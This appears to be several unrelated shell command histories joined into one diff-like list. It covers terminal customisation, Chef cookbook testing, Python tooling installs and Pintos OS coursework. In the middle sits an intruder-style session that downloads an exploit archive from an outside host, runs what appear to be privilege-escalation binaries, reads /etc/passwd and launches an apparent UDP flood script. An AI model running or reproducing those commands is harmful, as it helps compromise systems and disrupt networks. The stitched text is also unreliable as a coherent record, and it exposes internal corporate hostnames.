+sudo ncdu / +l +df -h . +./install.sh +colorls +rm -fr nerd-fonts/ +df -h . +./bootstrap +$CC +ll +colorls +colorls -lsa +colorls -l +ll +ll +ll +./print_icons.sh +ll +ll +export CC=clang CXX=clang++ +./configure --prefix=/opt/coreutils +make +host sonar.si.francetelecom.fr +host gitlab.si.francetelecom.fr +host artifactory.si.francetelecom.fr +make install +sudo make install +/opt/coreutils/bin/ls +/opt/coreutils/bin/ls -lsa +/opt/coreutils/bin/ls -lsa --color +colorls -l +/opt/coreutils/bin/ls -lsa --color +/opt/coreutils/bin/ls -lsah --color +lh +lsi +sudo ln -s /opt/coreutils/bin/ +ll +rm bin +sudo ln -s /opt/coreutils/bin/ls /usr/local/bin/lsi +lsi +df -h . +vi ~/.bash_aliases +vi ~/.bashrc +ll +ls +alias +alias ls='lsi' +ls +lsi +ls +lsi +lsi --help +printf "\x1b[${bg};2;${red};${green};${blue}m +" +awk 'BEGIN{ + s="/\\/\\/\\/\\/\\"; s=s s s s s s s s; + for (colnum = 0; colnum<77; colnum++) { + r = 255-(colnum*255/76); + g = (colnum*510/76); + b = (colnum*255/76); + if (g>255) g = 510-g; + printf "\033[48;2;%d;%d;%dm", r,g,b; + printf "\033[38;2;%d;%d;%dm", 255-r,255-g,255-b; + printf "%s\033[0m", substr(s,colnum+1,1); + } + printf " +"; +}' +export CFLAGS=-DNO_TRUE_COLOURS=1 +export CC=clang CXX=clang++ +./configure --prefix=/opt/coreutils +make +ssh atlas001.ref01.conso.qualif.gen01.ke.p.fti.net +sudo make install +lsi +lsi -l +lsi -l --color +alias ls='lsi' +ls +alias ls='ls --color=auto' +ls +ll +lh +ls +ll +ll +ll +ll +ll +ll +ll +ll +ll ~/.local/share/icons-in-terminal/icons_bash.sh +. ~/.local/share/icons-in-terminal/icons_bash.sh +echo -e $oct_location +vi ~/.bash_utils +ll +ll +./install-autodetect.sh +vi ~/.config/fontconfig/conf.d/30-icons.conf +ll +ll +colorls +colorls -l +cl +colorls --help +colorls -la +colorls -lah +colorls -lah --gs +colorls -lah --gs --hyperlink +colorls -lah --gs +colorls -lAh --gs +colorls -lAh --gs --sd +vi ~/.bash_aliases +li +l +li +l +l +l | grep bash +$(dirname $(gem which colorls))/yaml ~/.config/colorls +ll $(dirname $(gem which colorls))/yaml +cp $(dirname $(gem which colorls))/yaml ~/.config/colorls +cp -r $(dirname $(gem which colorls))/yaml ~/.config/colorls +ll +l +ll +alias +alias l='colorls -lAh --sd' +l +alias l='colorls--sd' +colorls -lAh --gs --sd +colorls +colorls l +ll +alias +ll +ll +l +ll +vi files.yaml +ls +l +l /home/orobardet/dev/go/src/gitlab.si.francetelecom.fr/melvis/tools/gdpr-es-extractor/ +ls +l /home/orobardet/dev/go/src/gitlab.si.francetelecom.fr/melvis/tools/gdpr-es-extractor/ +ll +l +ll Downloads/ +l Downloads/ +l +vi dark_colors.yaml +ll +ll +l +vi file_aliases.yaml +vi files.yaml +vi file_aliases.yaml +ll +ll +ll +pwd +cp -r colorls ~/dev/_perso/linux-conf +ll +l +ll +l +ll +cp .vimrc ~/dev/_perso/linux-conf/work/orgn/ +chef -v +chef gem list | docker +gem list | docker +sudo chef gem list | docker +gem list +gem list | docker +chef gem list | grep docker +chef -v +yum -y remove chefdk +set -o vi +sudo yum -y remove chefdk +sudo rpm -is.chef.io/files/stable/chefdk/1.0.3/el/6/chefdk-1.0.3-1.el6.x86_64.rpm +chev -v +chef -v +clear +vi .bash_profile +. ./.bash_profile +c +netsat -nr +exit +ls +ls -lrt +ls +ls -lrt +passwd +ls +ls -lrt +echo $PS1 +ls +ls -lrt +ls -alq +knife client list +ls +ls -lrt +ls +ls -lrt +ls +ls -lrt +chef generate cookbook httpd +tree +yum install tree +sudo yum install tree +tree +ls +ls -lrt +tree httpd/ +#vi httpd/test/recipes/default_test.rb +sudo chef-apply -e "package 'tree'" +man chef-apply +chef-apply -v +chef-apply -h +vi httpd/test/recipes/default_test.rb +sudo chef-apply -e "package 'vim'" +vi httpd/test/recipes/default_test.rb +vim httpd/test/recipes/default_test.rb +ls +ls -lrt +vi .kitchen.yml +kitchen list +vi .kitchen.yml +gem install docker +vi .kitchen.yml +kitchen list +ls +ls -lrt +less .kitchen/logs/kitchen.log +exit +chef -v +ls +ls -lrt +ls +ls -lrt +kitchen list +kitchen list --all +kitchen ? +kitchen -h +kitchen drive help +kitchen driver help +kitchen driver docker +kitchen driver discover +kitchen driver kitchen-docker create +kitchen driver create +kitchen list +gem install kitchen-docker +kitchen list +chef exec gem install kitchen-docker +kitchen list +ls -lrt +ls +kitchen create +kitchen status +ls + ls -lrt +ls +ls -lrt +#kitchen converge +kitchen converge +berks install +kitchen converge +ls +ls -lrt +ls +ls -lrt +vi default.rb +ls +ls -lrt +l +ls -lrt +vi default_test.rb +kitchen verify +kitchen verify +kitchen verify +ls +ls -lrt +ls +ls -lrt +ls +ls -rlt +ls +ls -lrt +vi default.rb +kitchen converge +kitchen verify +ls +ls -lrt +vi test/recipes/default_test.rb +ls +ls -lrt +vi recipes/default.rb +kitchen +vi recipes/default.rb +kitchen verify +ls +ls -lrt +vi recipes/default.rb +less recipes/default.rb +kitchen verify +kitchen converge +kitchen verify +chef generate recipe install +chef generate recipe install +cat test/recipes/install.rb +rm test/recipes/install.rb +vi recipes/install.rb +vi recipes/default.rb +kitchen converge +ls -lrt +ls +ls -lrt +cat default.rb +cat install.rb +chef generate recipe configuration +rm test/recipes/configuration.rb +vi recipes/configuration.rb +cat test/recipes/default_test.rb +vi recipes/default.rb +vi recipes/configuration.rb +kitchen converge +ls +ls -lrt +vi recipes/default.rb +ls +vi recipes/install.rb +chef generate recipe service +rm test/recipes/service.rb +vi recipes/install.rb +vi recipes/service.rb +vim recipes/service.rb +vi recipes/service.rb +vim recipes/service.rb +vi recipes/service.rb +kitchen converge +kitchen verify +vi recipes/default.rb +kitchen converge; kitchen verify +kitchen destroy && kitchen test +vi recipes/default.rb +kitchen destroy && kitchen test +clear +netstat -nr +clear +ls +ls -lr +ls +ls -lrt +tree +ls +ls -lrt +ls +ls -lrt +tree spec +cat spec/unit/recipes/default_spec.rb +clear +cat spec/unit/recipes/default_spec.rb +clear +less spec/unit/recipes/default_spec.rb +cat spec/unit/recipes/default_spec.rb +i +clear +ls +ls -lrt +ls spec/unit/recipes/default_spec.rb +chef exec rspec spec/unit/recipes/default_spec.rb +less spec/unit/recipes/default_spec.rb +vi spec/unit/recipes/default_spec.rb +chef exec rspec spec/unit/recipes/default_spec.rb +vi recipes/default.rb +chef exec rspec spec/unit/recipes/default_spec.rb +vi spec/unit/recipes/default_spec.rb +chef exec rspec spec/unit/recipes/default_spec.rb +vi spec/unit/recipes/default_spec.rb +chef exec rspec spec/unit/recipes/default_spec.rb +vi spec/unit/recipes/default_spec.rb +ls -lrt spec/unit/recipes/default_spec.rb +ls -lrt spec/unit/recipes/* +vi spec/unit/recipes/default_spec.rb +chef exec rspec spec/unit/recipes/default_spec.rb +vi spec/unit/recipes/default_spec.rb +chef exec rspec spec/unit/recipes/default_spec.rb +vi spec/unit/recipes/default_spec.rb +vi recipes/default.rb +vi spec/unit/recipes/default_spec.rb +chef exec rspec spec/unit/recipes/default_spec.rb +vi spec/unit/recipes/default_spec.rb +vi recipes/default.rb +chef exec rspec spec/unit/recipes/default_spec.rb +vi spec/spec_helper.rb +vi spec/unit/recipes/install_spec.rb +vi spec/spec_helper.rb +vi recipes/default.rb +chef exec rspec spec/unit/recipes/default_spec.rb +vi recipes/default.rb +kitchen list +kitchen test +vi recipes/default.rb +kitchen test +vi recipes/default.rb +kitchen test +chef -v +vi spec/unit/recipes/install_spec.rb +chef exec rspec spec/unit/recipes/install.rb +chef exec rspec spec/unit/recipes/install_spec.rb +ls +vi recipes/install.rb +vi recipes/default.rb +chef exec rspec spec/unit/recipes/install_spec.rb +vi recipes/default.rb +chef exec rspec spec/unit/recipes/install_spec.rb +chef exec rspec spec/unit/recipes/default._spec.rb +chef exec rspec spec/unit/recipes/default_spec.rb +t +vi spec/unit/recipes/service_spec.rb +ls +vi recipes/service.rb +vi recipes/install.rb +chef exec rspec spec/unit/recipes/default_spec.rb +chef exec rspec spec/unit/recipes/*_spec* +vi spec/unit/recipes/service_spec.rb +chef exec rspec spec/unit/recipes/install_spec.rb +vi spec/unit/recipes/service_spec.rb +vi spec/unit/recipes/install_spec.rb +vi spec/unit/recipes/service_spec.rb +chef exec rspec spec/unit/recipes/ser +chef exec rspec spec/unit/recipes/service_spec.rb +vi recipes/install.rb +vi recipes/service.rb +chef exec rspec spec/unit/recipes/service_spec.rb +vi recipes/service.rb +chef exec rspec spec/unit/recipes/service_spec.rb +ls -lrt +vi recipes/install.rb +chef exec rspec +chef generate attribute default +ls +ls -lrt +less default.rb +vi default.rb +v default.rb +cat default.rb +vi default.rb +chef exec rspec +chef exec rspec +ls +ls -lrt +ls +ls -lrt +cat default.rb +ls +ls -lrt +cat spec/spec_helper.rb +ls +ls -lrt +cat recipes/default.rb +cat recipes/service.rb +cat recipes/configuration.rb +clear +vi recipes/install.rb +chef exec rspec spec/unit/recipes/install_spec.rb +ls +ls -lrt +ls +ls -lrt +cat default.rb +cat service.rb +cat install.rb +vi install.rb +#chef exec rspec spec/unit/recipes/install_spec.rb +chef exec rspec spec/unit/recipes/install_spec.rb +vi install.rb +vi recipes/install.rb +ls +ls -lrt +vi recipes/install.rb +vi recipes/default.rb +vi recipes/configuration.rb +vi recipes/service.rb +vi attributes/default.rb +vi recipes/configuration.rb +vi attributes/default.rb +vi recipes/default.rb +vi recipes/service.rb +#chef exec rspec spec/unit/recipes/service_spec.rb +vi recipes/service.rb +chef exec rspec spec/unit/recipes/service_spec.rb +vi recipes/service.rb +cat recipes/configuration.rb +vi recipes/default.rb +chef exec rspec spec/unit/recipes/default_spec.rb +vi recipes/default.rb +ls +ls -lrt +vi spec/unit/recipes/install_spec.rb +chef exec rspec spec/unit/recipes/install_spec.rb +vi attributes/default.rb +chef exec rspec spec/unit/recipes/install_spec.rb +vi attributes/default.rb +chef exec rspec spec/unit/recipes/default.html +chef exec rspec spec/unit/recipes/default_spec.rb +chef exec rspec spec/unit/recipes/* +ls +ls -lrt +vi .kitchen.yml +vi spec/unit/recipes/service_spec.rb +chef exec rspec spec/unit/recipes/service_spec.rb +vi spec/unit/recipes/service_spec.rb +chef exec rspec spec/unit/recipes/service_spec.rb +vi spec/unit/recipes/service_spec.rb +chef exec rspec spec/unit/recipes/service_spec.rb +vi spec/unit/recipes/service_spec.rb +ls +ls -lrt +ls +ls -rlt +ls +ls -lrt +vi default.rb +ls +lcd .. +ls +ls -lrt +vi recipes/default.rb +vi recipes/install.rb +vi recipes/service.rb +vi recipes/configuration.rb +vi attributes/default.rb +chef exec rspec spec/unit/recipes/service_spec.rb +vi recipes/service.rb +ls +vi spec/spec_helper.rb +vi spec/unit/recipes/service_spec.rb +vi spec/unit/recipes/default_spec.rb +vi spec/unit/recipes/install_spec.rb +chef exec rspec spec/unit/recipes/service_spec.rb +ls +vi recipes/install.rb +vi recipes/default.rb +chef exec rspec spec/unit/recipes/configureation_spec.rb +chef exec rspec spec/unit/recipes/configuration_spec.rb +cat spec/unit/recipes/install_spec.rb +vi spec/unit/recipes/configuration_spec.rb +chef exec rspec spec/unit/recipes/service.rb +chef exec rspec spec/unit/recipes/service_spec.rb +vi spec/unit/recipes/service_spec.rb +vi attributes/default.rb +chef exec rspec spec/unit/recipes/service_spec.rb +vi attributes/default.rb +chef exec rspec spec/unit/recipes/service_spec.rb +chef exec rspec spec/unit/recipes/install_spec.rb +vi recipes/install.rb +vi recipes/default.rb +vi attributes/default.rb +vi spec/unit/recipes/install_spec.rb +chef exec rspec spec/unit/recipes/install_spec.rb +vi spec/unit/recipes/install_spec.rb +chef exec rspec spec/unit/recipes/install_spec.rb +vi spec/unit/recipes/service_spec.rb +ruby -c spec/unit/recipes/service_spec.rb +chef exec rspec spec/unit/recipes/service_spec.rb +vi spec/unit/recipes/service_spec.rb +ruby -c spec/unit/recipes/service_spec.rb +chef exec rspec spec/unit/recipes/service_spec.rb +vi spec/unit/recipes/service_spec.rb +ruby -c spec/unit/recipes/service_spec.rb +chef exec rspec spec/unit/recipes/service_spec.rb +vi attributes/default.rb +chef exec rspec spec/unit/recipes/service_spec.rb +vi spec/unit/recipes/service_spec.rb +chef exec rspec spec/unit/recipes/service_spec.rb +vi spec/unit/recipes/service_spec.rb +vi spec/unit/recipes/service_spec.rb +vi recipes/service.rb +vi attributes/default.rb +vi recipes/service.rb +vi attributes/default.rb +chef exec rspec spec/unit/recipes/service_spec.rb +vi attributes/default.rb +vi spec/unit/recipes/default_spec.rb +vi spec/unit/recipes/service_spec.rb +chef exec rspec spec/unit/recipes/install_spec.rbn +chef exec rspec spec/unit/recipes/install_spec.rb +vi spec/unit/recipes/install_spec.rb +vi .kitchen.yml +vi spec/unit/recipes/install_spec.rb +chef exec rspec spec/unit/recipes/install_spec.rb +chef exec rspec spec/unit/recipes/service_spec.rb +vi spec/unit/recipes/install_spec.rb +vi spec/unit/recipes/service_spec.rb +vi spec/unit/recipes/install_spec.rb +vi spec/unit/recipes/service_spec.rb +vi spec/unit/recipes/install_spec.rb +vi spec/unit/recipes/service_spec.rb +ruby -c spec/unit/recipes/service_spec.rb +chef exec rspec spec/unit/recipes/service_spec.rb +ls +ls -lrt +chef exec rspec spec/unit/recipes/* +vi metadata.rb +ls +sl -lrt +ls -lrt +berks upload +berks install +berks upload +ls -lrt +vi metadata.rb +vi attributes/default.rb +chef exec rspec spec/unit/recipes/default_spec.rb +vi recipes/default.rb +vi recipes/install.rb +vi recipes/configuration.rb +chef exec rspec spec/unit/recipes/default_spec.rb +chef exec rspec spec/unit/recipes/configuration_spec.rb +vi recipes/configuration.rb +vi recipes/default.rb +vi recipes/configuration.rb +chef exec rspec spec/unit/recipes/configuration_spec.rb +vi recipes/ +vi recipes/configuration.rb +chef exec rspec spec/unit/recipes/configuration_spec.rb +vi recipes/configuration.rb +chef exec rspec spec/unit/recipes/configuration_spec.rb +vi recipes/configuration.rb +vi spec/unit/recipes/configuration_spec.rb +vi recipes/configuration.rb +chef exec rspec spec/unit/recipes/configuration_spec.rb +ls +ls -lt +chef cookbook +chef generate +chef generate template index.html +ls +vi templates/index.html.erb +chef exec rspec spec/unit/recipes/configuration_spec.rb +#chef-client +chef-client +wget -qO -sublimetext.com/sublimehq-pub.gpg | sudo apt-key add - +sudo apt-get install apt-transport-https +echo "debsublimetext.com/ apt/stable/" | sudo tee /etc/apt/sources.list.d/sublime-text.list +sudo apt-get update +sudo apt-get install sublime-text +sudo apt-get install pipenv +sudo apt-get install pipe +sudo apt-get install git +sudo apt-get install nodejs && npm +sudo apt-get install nodejs +sudo apt-get install npm +sudo apt-get install sublime-text +sudo apt install software-properties-common python-software-properties +sudo add-apt-repository ppa:pypa/ppa +apt-get update +sudo add-apt-repository ppa:pypa/ppa +apt-get update +sudo apt update +sudo apt install pipenv +sudo apt-get install pip +sudo apt-get install python-setuptools python-dev build-essential +sudo easy_install pip +sudo apt-get pip +sudo apt update +sudo apt-get pip +apt-get install pip +sudo apt-get install pip +sudo apt-get install python-pip python-dev build-essential +sudo pip install --upgrade pip +pip install pipenv +sudo pip install pipenv +sudo apt-get install git python-pip make build-essential libssl-dev zlib1g-dev libbz2-dev libreadline-dev libsqlite3-dev curl +gedit +./home/student/Desktop/pynv.sh' + +shell pynv.sh +./pynv.sh +sudo ./pynv.sh +chmod -x pynv.sh +sudo ./pynv.sh +sudo apt-get install git python-pip make build-essential libssl-dev zlib1g-dev libbz2-dev libreadline-dev libsqlite3-dev curl +sudo pip install virtualenvwrapper +git clone +git clones/pyenv-virtualenvwrapper +echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.bashrc +echo 'export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.bashrc +echo 'eval "$(pyenv init -)"' >> ~/.bashrc +echo 'pyenv virtualenvwrapper' >> ~/.bashrc +exec $SHELL +w +uname -a +wget browse.evonet.ro/privat/exploits.tgz +tar -xzvf exploits.tgz +./fedora +./x +passwd +cat /etc/passwd +su peter +cat /etc/issue +wget +perl udp +perl udp 53 0 +cat /proc/cpuinfo +w +ls +ls -al +? +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls -al +ls +ls -al +cp -r pintos cd /../home/team13a/ +cp -r pintos /../home/team13a/ +ls +ls +ls +ls +ls +ls +pintos +ls +pintos -v -- -q run alarm-multiple +pintos -v -- -q run alarm-multiple +ls +make +ls +echo 'export PATH=$PATH:~/pintos/src/utils/' >> ~/.bashrc +source ~/.bashrc +Makefile.userprog +pintos –v -- -q run alarm-multiple +ls +echo 'export PATH=$PATH:~/pintos/src/utils/' >> ~/.bashrc +======================================================================== +source ~/.bashrc +pintos –v -- -q run alarm-multiple +ls +ls +pintos –v -- -q run alarm-multiple +pintos –v -- -q run alarm-multiple +ls +pintos –v -- -q run alarm-multiple +ls +make +pintos –v -- -q run alarm-multiple +make +ls +ls +ls +ls +ls +make check +make grade +ls +ls +make +ls +ls +c tests/threads/ +ls +ls +ls +make grade +ls +ls +ls +Grading +vi mlfqs-block.c +ls +vi Make.tests +ls +vi Make.tests +ls +vi Grading +ls +make grade +make check +make[1]: Entering directory '/home/team13a/pintos/src/threads/build' +../../tests/threads/Make.tests:4: *** unterminated call to function 'addprefix': missing ')'. Stop. +make[1]: Leaving directory '/home/team13a/pintos/src/threads/build' +../Makefile.kernel:10: recipe for target 'grade' failed +make: *** [grade] Error 2 +ls +make grade +vi Make.tests +ls +ls +ls +vi Make.tests +ls +ls +ls +make grade +make check +make grade +ls +20 of 27 tests failed. +make check +ls +ls +vi Make.tests +vi Grading +ls +make gra +make grade +ls +ls +ls +make +make check +make clean +make check +make grade +make clean +make grade>result +result +make grade +make check +make grade +ls +vi Make.tests +ls +vi Grading +ls +vi Make.tests +ls +make clean +ls +make clean +make grade>result +ls +result +vi result +make +make +mak +make +make +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-multiple -a args-multiple -- -q -f run 'args-multiple some arguments for you!' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-multiple -a args-multiple -- -q -f run 'args-multiple some arguments for you!' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-multiple -a args-multiple -- -q -f run 'args-multiple some arguments for you!' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-multiple -a args-multiple -- -q -f run 'args-multiple some arguments for you!' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-multiple -a args-multiple -- -q -f run 'args-multiple some arguments for you!' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-multiple -a args-multiple -- -q -f run 'args-multiple some arguments for you!' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-multiple -a args-multiple -- -q -f run 'args-multiple some arguments for you!' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-multiple -a args-multiple -- -q -f run 'args-multiple some arguments for you!' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-multiple -a args-multiple -- -q -f run 'args-multiple some arguments for you!' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-multiple -a args-multiple -- -q -f run 'args-multiple some arguments for you!' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-multiple -a args-multiple -- -q -f run 'args-multiple some arguments for you!' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-multiple -a args-multiple -- -q -f run 'args-multiple some arguments for you!' +makepintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single onearg' +make grade +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single onearg' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single onearg' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single onearg' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single onearg' +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run 'args-none' +mkae +make +mkae +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run 'args-none' +make +mkae +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run 'args-none' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run 'args-none' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run 'args-none' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run 'args-none' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run 'args-none' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run 'args-none' +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single onearg' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single onearg' +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run 'args-none' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run 'args-none' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run 'args- +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run 'args-none' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run 'args-none' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run 'args-none' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run 'args-none' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run 'args-none' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run 'args-none' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run 'args-none' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run 'args-none' +mak +make +makmake +make +makmake +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run 'args-none' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run 'args-none' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run 'args-none' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run 'args-none' + +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single arg-one' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single arg-one' +make +ake +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single arg-one' +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run 'args-none' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run 'args-none' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run 'args-none' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-none -a args-none -- -q -f run 'args-none' +make +make grade +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single arg-one' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single arg-one' +make +make +make +make +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single arg-one' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single arg-one' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single arg-one' +make grade +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single arg-one' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single arg-one' +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run '/bin/ls -l foo bar' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run '/bin/ls -l foo bar' +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single arg-one' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single arg-one' +make grade +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single arg-one s 2 sfw' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single arg-one s 2 sfw' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single arg-one s 2 sfw' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single arg-one s 2 sfw' +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single arg-one s sfw' +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'arg-none s ' +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run '' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single ss' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single ss' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single ss' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single ss' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single ss' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single ss' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single ss' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single ss' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single ss' +mamake +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single ss' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single ss' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single ss' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single ss' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single ss' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single ss' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single ss' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single ss' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single ss' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single ss' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single ss' +make +makemake +make +makemake +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single ss' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single ss' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single ss' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single ss' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single ss' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single ss' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single ss' +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/userprog/args-single -a args-single -- -q -f run 'args-single ss' +make +pintos -v -k -T 60 